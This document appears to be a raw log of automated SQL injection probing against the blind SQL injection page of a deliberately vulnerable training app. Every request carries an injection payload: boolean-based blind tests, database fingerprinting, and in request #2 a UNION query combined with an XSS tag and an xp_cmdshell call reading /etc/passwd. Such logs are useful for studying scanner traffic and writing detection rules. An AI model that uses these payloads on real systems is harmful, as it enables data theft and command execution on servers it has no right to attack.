HTTP request [#1]:
GET /vulnerabilities/sqli_blind/?id=1&Submit=Submit HTTP/1.1
--
HTTP request [#2]:
GET /vulnerabilities/sqli_blind/?id=1&Submit=Submit&HEqc%3D6738%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23 HTTP/1.1
--
HTTP request [#3]:
GET /vulnerabilities/sqli_blind/?id=1&Submit=Submit HTTP/1.1
--
HTTP request [#4]:
GET /vulnerabilities/sqli_blind/?id=4577&Submit=Submit HTTP/1.1
--
HTTP request [#5]:
GET /vulnerabilities/sqli_blind/?id=2700&Submit=Submit HTTP/1.1
--
HTTP request [#6]:
GET /vulnerabilities/sqli_blind/?id=1%27%29%22%2C%28%28.%28%27%22&Submit=Submit HTTP/1.1
--
HTTP request [#7]:
GET /vulnerabilities/sqli_blind/?id=1%27KdHcGh%3C%27%22%3EYFvrNz&Submit=Submit HTTP/1.1
--
HTTP request [#8]:
GET /vulnerabilities/sqli_blind/?id=1%29%20AND%204217%3D4540%20AND%20%282790%3D2790&Submit=Submit HTTP/1.1
--
HTTP request [#9]:
GET /vulnerabilities/sqli_blind/?id=1%29%20AND%202983%3D2983%20AND%20%288108%3D8108&Submit=Submit HTTP/1.1
--
HTTP request [#10]:
GET /vulnerabilities/sqli_blind/?id=1%20AND%204920%3D4161&Submit=Submit HTTP/1.1
--
HTTP request [#11]:
GET /vulnerabilities/sqli_blind/?id=1%20AND%202983%3D2983&Submit=Submit HTTP/1.1
--
HTTP request [#12]:
GET /vulnerabilities/sqli_blind/?id=1%20AND%204473%3D2009--%20FeZG&Submit=Submit HTTP/1.1
--
HTTP request [#13]:
GET /vulnerabilities/sqli_blind/?id=1%20AND%202983%3D2983--%20bTbR&Submit=Submit HTTP/1.1
--
HTTP request [#14]:
GET /vulnerabilities/sqli_blind/?id=1%27%29%20AND%201243%3D3028%20AND%20%28%27njIu%27%3D%27njIu&Submit=Submit HTTP/1.1
--
HTTP request [#15]:
GET /vulnerabilities/sqli_blind/?id=1%27%29%20AND%202983%3D2983%20AND%20%28%27HPWp%27%3D%27HPWp&Submit=Submit HTTP/1.1
--
HTTP request [#16]:
GET /vulnerabilities/sqli_blind/?id=1%27%20AND%203662%3D8858%20AND%20%27TwXU%27%3D%27TwXU&Submit=Submit HTTP/1.1
--
HTTP request [#17]:
GET /vulnerabilities/sqli_blind/?id=1%27%20AND%202983%3D2983%20AND%20%27FWka%27%3D%27FWka&Submit=Submit HTTP/1.1
--
HTTP request [#18]:
GET /vulnerabilities/sqli_blind/?id=1%27%20AND%209477%3D8906%20AND%20%27GGLK%27%3D%27GGLK&Submit=Submit HTTP/1.1
--
HTTP request [#19]:
GET /vulnerabilities/sqli_blind/?id=1%27%20AND%2060%3D60%20AND%20%27EHKL%27%3D%27EHKL&Submit=Submit HTTP/1.1
--
HTTP request [#20]:
GET /vulnerabilities/sqli_blind/?id=1%27%20AND%2060%3D93%20AND%20%27SLfD%27%3D%27SLfD&Submit=Submit HTTP/1.1
--
HTTP request [#21]:
GET /vulnerabilities/sqli_blind/?id=1%27%20AND%2093%3D90%20AND%20%27omDX%27%3D%27omDX&Submit=Submit HTTP/1.1
--
HTTP request [#22]:
GET /vulnerabilities/sqli_blind/?id=1%27%20AND%2090%3D90%20AND%20%27MjDQ%27%3D%27MjDQ&Submit=Submit HTTP/1.1
--
HTTP request [#23]:
GET /vulnerabilities/sqli_blind/?id=1%27%20AND%2093%2090%20AND%20%27APGx%27%3D%27APGx&Submit=Submit HTTP/1.1
--
HTTP request [#24]:
GET /vulnerabilities/sqli_blind/?id=1%27%20AND%208894%3D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%208894%20AND%20%27qhGc%27%3D%27qhGc&Submit=Submit HTTP/1.1
--
HTTP request [#25]:
GET /vulnerabilities/sqli_blind/?id=1%27%20AND%20%289929%29%3D9929%20AND%20%27BAox%27%3D%27BAox&Submit=Submit HTTP/1.1
--
HTTP request [#26]:
GET /vulnerabilities/sqli_blind/?id=1%27%20AND%209930%3E9929%20AND%20%27VXhS%27%3D%27VXhS&Submit=Submit HTTP/1.1
--
HTTP request [#27]:
GET /vulnerabilities/sqli_blind/?id=1%27%20AND%20QUARTER%28NULL%29%20IS%20NULL%20AND%20%27KyXX%27%3D%27KyXX&Submit=Submit HTTP/1.1
--
HTTP request [#28]:
GET /vulnerabilities/sqli_blind/?id=1%27%20AND%20SESSION_USER%28%29%20LIKE%20USER%28%29%20AND%20%27HWeA%27%3D%27HWeA&Submit=Submit HTTP/1.1
--
HTTP request [#29]:
GET /vulnerabilities/sqli_blind/?id=1%27%20AND%20VERSION%28%29%20LIKE%200x254d61726961444225%20AND%20%27BdxN%27%3D%27BdxN&Submit=Submit HTTP/1.1
--
HTTP request [#30]:
GET /vulnerabilities/sqli_blind/?id=1%27%20AND%20ISNULL%28TIMESTAMPADD%28MINUTE%2C9265%2CNULL%29%29%20AND%20%27qwAB%27%3D%27qwAB&Submit=Submit HTTP/1.1
